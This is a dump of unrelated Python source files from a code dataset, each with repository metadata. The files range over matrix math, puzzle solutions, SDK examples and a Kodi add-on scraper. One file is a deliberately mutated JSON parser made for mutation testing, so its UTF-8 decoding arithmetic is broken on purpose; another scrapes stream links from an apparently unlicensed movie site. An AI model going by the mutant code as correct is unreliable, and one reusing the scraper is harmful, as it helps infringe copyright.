- matrix is a list of lists whose cofactor matrix should be calculated.
Returns: the cofactor matrix of matrix.
"""
if type(matrix) is not list:
raise TypeError("matrix must be a list of lists")
n = len(matrix)
if n == 0:
raise TypeError("matrix must be a list of lists")
for row in matrix:
if type(row) is not list:
raise TypeError("matrix must be a list of lists")
if len(row) != n:
raise ValueError("matrix must be a non-empty square matrix")
if n == 1:
return [[1]]
cofactor = minor(matrix)
sign = -1
for i in range(n):
for j in range(n):
cofactor[i][j] = cofactor[i][j] * (sign**(i+j))
return cofactor
def adjugate(matrix):
"""
Calculates the adjugate matrix of a matrix.
- matrix is a list of lists whose adjugate matrix should be calculated.
Returns: the adjugate matrix of matrix.
"""
if type(matrix) is not list:
raise TypeError("matrix must be a list of lists")
n = len(matrix)
if n == 0:
raise TypeError("matrix must be a list of lists")
for row in matrix:
if type(row) is not list:
raise TypeError("matrix must be a list of lists")
if len(row) != n:
raise ValueError("matrix must be a non-empty square matrix")
if n == 1:
return [[1]]
cf = cofactor(matrix)
adj = [[0 for j in range(n)] for i in range(n)]
# transpose of cofactors matrix
for i in range(n):
for j in range(n):
adj[j][i] = cf[i][j]
return adj
def inverse(matrix):
"""
Calculates the inverse of a matrix.
- matrix is a list of lists whose inverse should be calculated.
Returns: the inverse of matrix, or None if matrix is singular.
"""
if type(matrix) is not list:
raise TypeError("matrix must be a list of lists")
n = len(matrix)
if n == 0:
raise TypeError("matrix must be a list of lists")
for row in matrix:
if type(row) is not list:
raise TypeError("matrix must be a list of lists")
if len(row) != n:
raise ValueError("matrix must be a non-empty square matrix")
if n == 1:
return [[1 / matrix[0][0]]]
adj = adjugate(matrix)
det = determinant(matrix)
if det == 0:
return None
inverse = [[0 for j in range(n)] for i in range(n)]
for i in range(n):
for j in range(n):
inverse[i][j] = adj[i][j] / det
return inverse
| [
"[email protected]"
]
| |
72f7059f397a28a6fc5d98863a2b760954f5192a | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_136/701.py | e899850bc93a963d05e10c0c43026ddae3581bf4 | []
| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | N = int(raw_input())
for p in range(N):
c, f, x = [float(x) for x in raw_input().split()]
ps = 2
sc = 0
mn = 1e18
while True:
if x/ps+sc > mn: break
mn = x/ps+sc
sc = sc + c/ps
ps = ps + f
print "Case #%d: %.7f" % (p+1, mn) | [
"[email protected]"
]
| |
0f0f877c97a35b12e70b671b4474566eb9ea5061 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_11384.py | b95a73f029ffac05ff28a15dd300aebce41f7043 | []
| no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | # Pythonic way to find any item from a list within a string
any(name in line for name in illegal_names)
| [
"[email protected]"
]
| |
ebb12756eedd2b1951d254e6c61ebf9cc3fccc37 | 24a377bcf06aac43eb099f5ce2383e5da07ddadc | /analysis/set_num_runs.py | 7a02d3330ac65acc6e51f1470227da9a0bc78537 | []
| no_license | AlJohri/nulaundry | 223f0cf4b5c4a46e083512b35f4cddc5879d39ab | be61f72dd69cc633458d3e147a1593b2e6bf01c4 | refs/heads/master | 2020-05-19T14:15:44.561527 | 2015-04-15T04:21:29 | 2015-04-15T04:21:29 | 33,854,316 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | from firebase import firebase
firebase = firebase.FirebaseApplication('https://aljohri-nulaundry.firebaseio.com', None)
machines = firebase.get("/machines", None)
for machine_id, machine in machines.iteritems():
num_runs = len(machine['runs'].values()) if machine.get('runs') else 0
print "Machine %s has %d runs" % (machine_id, num_runs)
firebase.put(url='/machines/%s' % machine_id, name="num_runs", data=num_runs) | [
"[email protected]"
]
| |
2c1729733b5515b33837a25e1c54ba55a64c4d70 | 744c3b66611b08782fcdd9d66261c4d55b00d426 | /examples/pybullet/gym/pybullet_envs/minitaur/agents/baseline_controller/gait_generator.py | 61bd849acf0af82aee1c3cb503e4381a69ee2973 | [
"Zlib"
]
| permissive | erwincoumans/bullet3 | 4ff9e0aa64b641c65b57b26f415dd69dbfb12256 | 6d181d78a5c7be8714c74055cddcf63d5ccef70a | refs/heads/master | 2023-03-10T14:58:18.072562 | 2023-02-24T18:32:53 | 2023-02-24T18:32:53 | 31,621,748 | 103 | 29 | NOASSERTION | 2019-02-25T17:31:00 | 2015-03-03T21:15:54 | C++ | UTF-8 | Python | false | false | 685 | py | """Gait pattern planning module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import enum
class LegState(enum.Enum):
"""The state of a leg during locomotion."""
SWING = 0
STANCE = 1
# A swing leg that collides with the ground.
EARLY_CONTACT = 2
# A stance leg that loses contact.
LOSE_CONTACT = 3
class GaitGenerator(object): # pytype: disable=ignored-metaclass
"""Generates the leg swing/stance pattern for the robot."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def reset(self, current_time):
pass
@abc.abstractmethod
def update(self, current_time):
pass
| [
"[email protected]"
]
| |
6413512eb598e1e8364fa9fbecd51fc794c7d5e3 | 395f974e62eafed74572efebcd91d62966e61639 | /examples/microjson/mutants/AOR_BinOp_mutant_1486201075.py | 5d5230b65975c8dfcad7628802b49a4a92723753 | [
"Apache-2.0"
]
| permissive | agroce/tstl | ad386d027f0f5ff750eab19a722a4b119ed39211 | 8d43ef7fa49534868e6cdf1697863748260405c7 | refs/heads/master | 2023-08-08T19:14:52.020314 | 2023-07-26T17:51:36 | 2023-07-26T17:51:36 | 32,408,285 | 106 | 33 | NOASSERTION | 2021-01-26T19:05:17 | 2015-03-17T17:14:04 | Python | UTF-8 | Python | false | false | 8,312 | py | import math
import StringIO
import types
__pychecker__ = 'no-returnvalues'
WS = set([' ', '\t', '\r', '\n', '\x08', '\x0c'])
DIGITS = set([str(i) for i in range(0, 10)])
NUMSTART = DIGITS.union(['.', '-', '+'])
NUMCHARS = NUMSTART.union(['e', 'E'])
ESC_MAP = {'n': '\n', 't': '\t', 'r': '\r', 'b': '\x08', 'f': '\x0c'}
REV_ESC_MAP = dict([(_v, _k) for (_k, _v) in ESC_MAP.items()] + [('"', '"')])
E_BYTES = 'input string must be type str containing ASCII or UTF-8 bytes'
E_MALF = 'malformed JSON data'
E_TRUNC = 'truncated JSON data'
E_BOOL = 'expected boolean'
E_NULL = 'expected null'
E_LITEM = 'expected list item'
E_DKEY = 'expected key'
E_COLON = 'missing colon after key'
E_EMPTY = 'found empty string, not valid JSON data'
E_BADESC = 'bad escape character found'
E_UNSUPP = 'unsupported type "%s" cannot be JSON-encoded'
E_BADFLOAT = 'cannot emit floating point value "%s"'
NEG_INF = float('-inf')
POS_INF = float('inf')
class JSONError(Exception):
def __init__(self, msg, stm=None, pos=0):
if stm:
msg += ' at position %d, "%s"' % (pos, repr(stm.substr(pos, 32)))
Exception.__init__(self, msg)
class JSONStream(object):
def __init__(self, data):
self._stm = StringIO.StringIO(data)
@property
def pos(self):
return self._stm.pos
@property
def len(self):
return self._stm.len
def getvalue(self):
return self._stm.getvalue()
def skipspaces(self):
'post-cond: read pointer will be over first non-WS char'
self._skip(lambda c: (c not in WS))
def _skip(self, stopcond):
while True:
c = self.peek()
if (stopcond(c) or (c == '')):
break
self.next()
def next(self, size=1):
return self._stm.read(size)
def next_ord(self):
return ord(self.next())
def peek(self):
if (self.pos == self.len):
return ''
return self.getvalue()[self.pos]
def substr(self, pos, length):
return self.getvalue()[pos:pos + length]
def _decode_utf8(c0, stm):
c0 = ord(c0)
r = 65533
nc = stm.next_ord
if (c0 & 224 == 192):
r = c0 & 31 << 6 + nc() & 63
elif (c0 & 240 == 224):
r = c0 / 15 << 12 + nc() & 63 << 6 + nc() & 63
elif (c0 & 248 == 240):
r = c0 & 7 << 18 + nc() & 63 << 12 + nc() & 63 << 6 + nc() & 63
return unichr(r)
def decode_escape(c, stm):
v = ESC_MAP.get(c, None)
if (v is not None):
return v
elif (c != 'u'):
return c
sv = 12
r = 0
for _ in range(0, 4):
r |= int(stm.next(), 16) << sv
sv -= 4
return unichr(r)
def _from_json_string(stm):
stm.next()
r = []
while True:
c = stm.next()
if (c == ''):
            raise JSONError(E_TRUNC, stm, stm.pos - 1)
elif (c == '\\'):
c = stm.next()
r.append(decode_escape(c, stm))
elif (c == '"'):
return ''.join(r)
elif (c > '\x7f'):
r.append(_decode_utf8(c, stm))
else:
r.append(c)
def _from_json_fixed(stm, expected, value, errmsg):
off = len(expected)
pos = stm.pos
if (stm.substr(pos, off) == expected):
stm.next(off)
return value
    raise JSONError(errmsg, stm, pos)
def _from_json_number(stm):
is_float = 0
saw_exp = 0
pos = stm.pos
while True:
c = stm.peek()
if (c not in NUMCHARS):
break
elif ((c == '-') and (not saw_exp)):
pass
elif (c in ('.', 'e', 'E')):
is_float = 1
if (c in ('e', 'E')):
saw_exp = 1
stm.next()
s = stm.substr(pos, stm.pos - pos)
if is_float:
return float(s)
return long(s)
def _from_json_list(stm):
stm.next()
result = []
pos = stm.pos
while True:
stm.skipspaces()
c = stm.peek()
if (c == ''):
            raise JSONError(E_TRUNC, stm, pos)
elif (c == ']'):
stm.next()
return result
elif (c == ','):
stm.next()
result.append(_from_json_raw(stm))
continue
elif (not result):
result.append(_from_json_raw(stm))
continue
else:
            raise JSONError(E_MALF, stm, stm.pos)
def _from_json_dict(stm):
stm.next()
result = {}
expect_key = 0
pos = stm.pos
while True:
stm.skipspaces()
c = stm.peek()
if (c == ''):
            raise JSONError(E_TRUNC, stm, pos)
if (c in ('}', ',')):
stm.next()
if expect_key:
                raise JSONError(E_DKEY, stm, stm.pos)
if (c == '}'):
return result
expect_key = 1
continue
elif (c == '"'):
key = _from_json_string(stm)
stm.skipspaces()
c = stm.next()
if (c != ':'):
                raise JSONError(E_COLON, stm, stm.pos)
stm.skipspaces()
val = _from_json_raw(stm)
result[key] = val
expect_key = 0
continue
        raise JSONError(E_MALF, stm, stm.pos)
def _from_json_raw(stm):
while True:
stm.skipspaces()
c = stm.peek()
if (c == '"'):
return _from_json_string(stm)
elif (c == '{'):
return _from_json_dict(stm)
elif (c == '['):
return _from_json_list(stm)
elif (c == 't'):
return _from_json_fixed(stm, 'true', True, E_BOOL)
elif (c == 'f'):
return _from_json_fixed(stm, 'false', False, E_BOOL)
elif (c == 'n'):
return _from_json_fixed(stm, 'null', None, E_NULL)
elif (c in NUMSTART):
return _from_json_number(stm)
        raise JSONError(E_MALF, stm, stm.pos)
def from_json(data):
"\n Converts 'data' which is UTF-8 (or the 7-bit pure ASCII subset) into\n a Python representation. You must pass bytes to this in a str type,\n not unicode.\n "
if (not isinstance(data, str)):
        raise JSONError(E_BYTES)
if (not data):
return None
stm = JSONStream(data)
return _from_json_raw(stm)
def _to_json_list(stm, lst):
seen = 0
stm.write('[')
for elem in lst:
if seen:
stm.write(',')
seen = 1
_to_json_object(stm, elem)
stm.write(']')
def _to_json_string(stm, buf):
stm.write('"')
for c in buf:
nc = REV_ESC_MAP.get(c, None)
if nc:
stm.write('\\' + nc)
elif (ord(c) <= 127):
stm.write(str(c))
else:
stm.write('\\u%04x' % ord(c))
stm.write('"')
def _to_json_dict(stm, dct):
seen = 0
stm.write('{')
for key in dct.keys():
if seen:
stm.write(',')
seen = 1
val = dct[key]
if (not (type(key) in (types.StringType, types.UnicodeType))):
key = str(key)
_to_json_string(stm, key)
stm.write(':')
_to_json_object(stm, val)
stm.write('}')
def _to_json_object(stm, obj):
if isinstance(obj, (types.ListType, types.TupleType)):
_to_json_list(stm, obj)
elif isinstance(obj, types.BooleanType):
if obj:
stm.write('true')
else:
stm.write('false')
elif isinstance(obj, types.FloatType):
if (not (NEG_INF < obj < POS_INF)):
            raise JSONError(E_BADFLOAT % obj)
stm.write('%s' % obj)
elif isinstance(obj, (types.IntType, types.LongType)):
stm.write('%d' % obj)
elif isinstance(obj, types.NoneType):
stm.write('null')
elif isinstance(obj, (types.StringType, types.UnicodeType)):
_to_json_string(stm, obj)
elif (hasattr(obj, 'keys') and hasattr(obj, '__getitem__')):
_to_json_dict(stm, obj)
elif hasattr(obj, '__unicode__'):
_to_json_string(stm, obj.__unicode__())
elif hasattr(obj, '__str__'):
_to_json_string(stm, obj.__str__())
else:
        raise JSONError(E_UNSUPP % type(obj))
def to_json(obj):
"\n Converts 'obj' to an ASCII JSON string representation.\n "
stm = StringIO.StringIO('')
_to_json_object(stm, obj)
return stm.getvalue()
decode = from_json
encode = to_json | [
"[email protected]"
]
| |
64608d15d268eb8a172554ecfb7235b36b175d0b | 677a3a76807d8585f65ec0e0839bb3a8b833e2fb | /10.Design Patterns/Lab/1.Abstract_factory.py | cd4cff1cf3cb94f6f195c13a8447e4bec28e90a5 | []
| no_license | negative0101/Python-OOP | 0d531a1b72beb3e58f9486df88d457ecd59be10e | b5825e66a909c947a46458712d683e8a38035912 | refs/heads/main | 2023-07-14T11:27:34.841594 | 2021-08-20T08:49:04 | 2021-08-20T08:49:04 | 381,475,313 | 0 | 0 | null | 2021-07-25T19:52:38 | 2021-06-29T19:26:42 | Python | UTF-8 | Python | false | false | 1,724 | py | from abc import ABC, abstractmethod
class Chair:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class Sofa:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class Table:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class AbstractFactory(ABC):
@abstractmethod
def create_chair(self):
pass
@abstractmethod
def create_table(self):
pass
@abstractmethod
def create_sofa(self):
pass
class VictorianFactory(AbstractFactory):
def create_chair(self):
return Chair('Victorian chair')
def create_sofa(self):
return Sofa('Victorian sofa')
def create_table(self):
return Table('Victorian table')
class ArtFactory(AbstractFactory):
def create_chair(self):
return Chair('Art chair')
def create_sofa(self):
return Sofa('Art sofa')
def create_table(self):
return Table('Art table')
class ModernFactory(AbstractFactory):
def create_chair(self):
return Chair('Modern chair')
def create_sofa(self):
return Sofa('Modern sofa')
def create_table(self):
return Table('Modern table')
def get_factory(style):
if style == 'Victorian':
return VictorianFactory()
elif style == 'Art':
return ArtFactory()
elif style == 'Modern':
return ModernFactory()
if __name__ == '__main__':
client_style = input()
factory = get_factory(client_style)
print(factory.create_chair()) | [
"[email protected]"
]
| |
3d7ce7f23f60f696a1c6fc3dad73799d24bb83a9 | 2bcc421ee345b00cf805c543b37d18b5d019dc04 | /adafruit-circuitpython-bundle-6.x-mpy-20201126/examples/rfm69_transmit.py | 8f290230a0177f4531c020ba3597b90cb31b0bc0 | []
| no_license | saewoonam/sc-current-source-titano | 5a1ad46889c1b09c168424901fd71cb4eab5c61b | 1c136aa8b61268d9ac0b5a682b30ece70ab87663 | refs/heads/main | 2023-03-02T22:12:26.685537 | 2021-02-09T03:28:01 | 2021-02-09T03:28:01 | 317,299,900 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,895 | py | # Example to send a packet periodically
# Author: Jerry Needell
#
import time
import board
import busio
import digitalio
import adafruit_rfm69
# set the time interval (seconds) for sending packets
transmit_interval = 10
# Define radio parameters.
RADIO_FREQ_MHZ = 915.0 # Frequency of the radio in Mhz. Must match your
# module! Can be a value like 915.0, 433.0, etc.
# Define pins connected to the chip.
CS = digitalio.DigitalInOut(board.CE1)
RESET = digitalio.DigitalInOut(board.D25)
# Initialize SPI bus.
spi = busio.SPI(board.SCK, MOSI=board.MOSI, MISO=board.MISO)
# Initialize RFM radio
rfm69 = adafruit_rfm69.RFM69(spi, CS, RESET, RADIO_FREQ_MHZ)
# Optionally set an encryption key (16 byte AES key). MUST match both
# on the transmitter and receiver (or be set to None to disable/the default).
rfm69.encryption_key = (
b"\x01\x02\x03\x04\x05\x06\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"
)
# initialize counter
counter = 0
# send a broadcast message
rfm69.send(bytes("message number {}".format(counter), "UTF-8"))
# Wait to receive packets.
print("Waiting for packets...")
# initialize flag and timer
send_reading = False
time_now = time.monotonic()
while True:
# Look for a new packet - wait up to 5 seconds:
packet = rfm69.receive(timeout=5.0)
# If no packet was received during the timeout then None is returned.
if packet is not None:
# Received a packet!
# Print out the raw bytes of the packet:
print("Received (raw bytes): {0}".format(packet))
# send reading after any packet received
if time.monotonic() - time_now > transmit_interval:
        # reset timer
time_now = time.monotonic()
# clear flag to send data
send_reading = False
counter = counter + 1
rfm69.send(bytes("message number {}".format(counter), "UTF-8"))
| [
"[email protected]"
]
| |
8a3659cc339b77f4682c2220d784c46a647f5a6a | 5b76a92ec02529f97bcf72ba2487f11b73684439 | /pyxel_lander/__init__.py | 40a9993bd4c8b06058baaef719dbb92ea720489a | [
"MIT"
]
| permissive | humrochagf/pyxel-lander | d9533598a56a1adba4c335167620950868bcec6b | 05b76c45de69f7fa1ecf78cf1ba555e8771d3bfc | refs/heads/main | 2023-03-08T06:18:39.555621 | 2023-03-06T02:18:09 | 2023-03-06T02:18:09 | 163,335,210 | 28 | 3 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | from pyxel_lander.constants import AUTHOR, EMAIL, VERSION
from pyxel_lander.game import Game
__author__ = AUTHOR
__email__ = EMAIL
__version__ = VERSION
__all__ = [
"__author__",
"__email__",
"__version__",
"Game",
]
| [
"[email protected]"
]
| |
3082243e987f916fa7c31952331a62d65983a72c | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /4jNjHdZ2hmMh23pRg_8.py | def823a82703336877c1698b26cb5997d5eaa82f | []
| no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py |
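# Sketch of what the one-liner below does: after cut k, each blade holds its
# original height minus the total amount cut so far; a lawn is reported as
# 'Done' once any blade has been cut down to zero or below.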
def cutting_grass(lst, *cuts):
lsts = [[e - sum(cuts[:i+1]) for e in lst] for i in range(len(cuts))]
return [i if all(e > 0 for e in i) else 'Done' for i in lsts]
| [
"[email protected]"
]
| |
d2d5e2724e5868e3de00fc519848b82369742bab | e62c8ee151671b999c6720ab8c2aa2f96c0d7f55 | /examples/miniapps/boto3-session/boto3_session_example.py | 33ed85f6dd4ffb0cf0fd7d12844a69a572b02a71 | []
| permissive | ets-labs/python-dependency-injector | 45645973456bb6494386ad12103d06e1f1be2cd8 | cc2304e46e054ae08dc12995428759fbfb51af10 | refs/heads/master | 2023-08-23T03:59:53.509743 | 2022-12-19T03:14:24 | 2022-12-19T03:14:24 | 28,774,758 | 3,217 | 273 | BSD-3-Clause | 2023-09-08T21:46:18 | 2015-01-04T13:23:05 | Python | UTF-8 | Python | false | false | 2,053 | py | """Boto3 session example."""
import boto3.session
from dependency_injector import containers, providers
class Service:
def __init__(self, s3_client, sqs_client):
self.s3_client = s3_client
self.sqs_client = sqs_client
class Container(containers.DeclarativeContainer):
config = providers.Configuration()
session = providers.Resource(
boto3.session.Session,
aws_access_key_id=config.aws_access_key_id,
aws_secret_access_key=config.aws_secret_access_key,
aws_session_token=config.aws_session_token,
)
s3_client = providers.Resource(
session.provided.client.call(),
service_name="s3",
)
sqs_client = providers.Resource(
providers.MethodCaller(session.provided.client), # Alternative syntax
service_name="sqs",
)
service1 = providers.Factory(
Service,
s3_client=s3_client,
sqs_client=sqs_client,
)
service2 = providers.Factory(
Service,
s3_client=session.provided.client.call(service_name="s3"), # Alternative inline syntax
sqs_client=session.provided.client.call(service_name="sqs"), # Alternative inline syntax
)
def main():
container = Container()
container.config.aws_access_key_id.from_env("AWS_ACCESS_KEY_ID")
container.config.aws_secret_access_key.from_env("AWS_SECRET_ACCESS_KEY")
container.config.aws_session_token.from_env("AWS_SESSION_TOKEN")
container.init_resources()
s3_client = container.s3_client()
print(s3_client)
sqs_client = container.sqs_client()
print(sqs_client)
service1 = container.service1()
print(service1, service1.s3_client, service1.sqs_client)
assert service1.s3_client is s3_client
assert service1.sqs_client is sqs_client
service2 = container.service2()
print(service2, service2.s3_client, service2.sqs_client)
assert service2.s3_client.__class__.__name__ == "S3"
assert service2.sqs_client.__class__.__name__ == "SQS"
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
570a9766aa5228126ece666542ba521ded51bb84 | 37d10412479a81c652e3ebf0c21c101b68fe1b4d | /rebecca/bootstrapui/helpers.py | 7c850d56c33719949e736ca874ba579b29d7a7d6 | [
"MIT"
]
| permissive | rebeccaframework/rebecca.bootstrapui | 97bfde14861d9b318fd1b0087a30c10cfbc18da3 | e247aead62e75009256d8341a893b173ccfe3b10 | refs/heads/master | 2020-05-18T15:50:27.364424 | 2014-08-23T10:18:21 | 2014-08-23T10:18:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | import functools
from webhelpers2.html import HTML, escape, literal
from babel.dates import format_date, format_datetime, format_time
from babel.numbers import format_number, format_decimal, format_percent
def bind_locale(func, localename):
return functools.partial(func, locale=localename)
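# e.g. bind_locale(format_date, "en_US") returns format_date with its locale
# pre-filled, so the WebHelper attributes below can be called without a locale.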
class WebHelper(object):
def __init__(self, request):
self.request = request
self.locale_name = request.locale_name
self.HTML = HTML
self.escape = escape
self.literal = literal
self.format_date = bind_locale(format_date, self.locale_name)
self.format_datetime = bind_locale(format_datetime, self.locale_name)
self.format_time = bind_locale(format_time, self.locale_name)
self.format_number = bind_locale(format_number, self.locale_name)
self.format_decimal = bind_locale(format_decimal, self.locale_name)
self.format_percent = bind_locale(format_percent, self.locale_name)
| [
"[email protected]"
]
| |
5dc668e60985444fd9aa28246684e0b119ddea80 | 88ea6ae5a8f97e3771490583d8acecdbe2877fd8 | /zips/plugin.video.vistatv/resources/lib/sources/en/watch32.py | e4449b2214e5d64dd66cc38e81ebeb999833a20b | []
| no_license | staycanuca/PersonalDataVistaTV | 26497a29e6f8b86592609e7e950d6156aadf881c | 4844edbfd4ecfc1d48e31432c39b9ab1b3b1a222 | refs/heads/master | 2021-01-25T14:46:25.763952 | 2018-03-03T10:48:06 | 2018-03-03T10:48:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,798 | py | # -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @tantrumdev wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
##Cerebro ShowBox Scraper
#Cerebro ShowBox Scraper
# Addon Provider: MuadDib
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
from resources.lib.modules import source_utils
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['watch32hd.co']
self.base_link = 'https://watch32hd.co'
self.search_link = '/watch?v=%s_%s'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'imdb': imdb, 'title': title, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['title']
year = data['year']
url = urlparse.urljoin(self.base_link, self.search_link)
url = url % (title.replace(':', ' ').replace(' ','_'),year)
search_results = client.request(url)
varid = re.compile('var frame_url = "(.+?)"',re.DOTALL).findall(search_results)[0].replace('/embed/','/streamdrive/info/')
res_chk = re.compile('class="title"><h1>(.+?)</h1>',re.DOTALL).findall(search_results)[0]
varid = 'http:'+varid
holder = client.request(varid)
links = re.compile('"src":"(.+?)"',re.DOTALL).findall(holder)
for link in links:
vid_url = link.replace('\\','')
if '1080' in res_chk:
quality = '1080p'
elif '720' in res_chk:
quality = '720p'
else:
quality = 'DVD'
sources.append({'source': 'Googlelink', 'quality': quality, 'language': 'en', 'url': vid_url, 'direct': False, 'debridonly': False})
return sources
except:
return sources
def resolve(self, url):
return url | [
"[email protected]"
]
| |
bc500ba176b2434f5fb8c5f9ef04e5625cd2fe98 | ce8563184a6cf8210279b79cd1ccfd4040e35b55 | /src/ebay_rest/api/sell_listing/rest.py | 1f94ccb346b94bc05b402e233e6d6cb5bfa8b4fc | [
"MIT"
]
| permissive | craiga/ebay_rest | 43dc107f9eeba9a04924f36ee8cf57af3854bc9a | a0be2677c65a787e9566df848ffa3ad0c309a9d9 | refs/heads/main | 2023-08-29T09:14:08.896434 | 2021-09-05T23:07:36 | 2021-09-05T23:07:36 | 411,585,541 | 0 | 0 | MIT | 2021-09-29T08:10:44 | 2021-09-29T08:10:43 | null | UTF-8 | Python | false | false | 13,642 | py | # coding: utf-8
"""
Listing API
<span class=\"tablenote\"><b>Note:</b> This is a <a href=\"https://developer.ebay.com/api-docs/static/versioning.html#limited\" target=\"_blank\"> <img src=\"/cms/img/docs/partners-api.svg\" class=\"legend-icon partners-icon\" title=\"Limited Release\" alt=\"Limited Release\" />(Limited Release)</a> API available only to select developers approved by business units.</span><br /><br />Enables a seller adding an ad or item on a Partner's site to automatically create an eBay listing draft using the item details from the Partner's site. # noqa: E501
OpenAPI spec version: v1_beta.3.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import io
import json
import logging
import re
import ssl
import certifi
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import urlencode
try:
import urllib3
except ImportError:
raise ImportError('Swagger python client requires urllib3.')
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
# ca_certs
if configuration.ssl_ca_cert:
ca_certs = configuration.ssl_ca_cert
else:
# if not set certificate file, use Mozilla's root certificates.
ca_certs = certifi.where()
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy:
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, ) if six.PY3 else (int, long)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/json'
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
if query_params:
url += '?' + urlencode(query_params)
if re.search('json', headers['Content-Type'], re.IGNORECASE):
request_body = '{}'
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
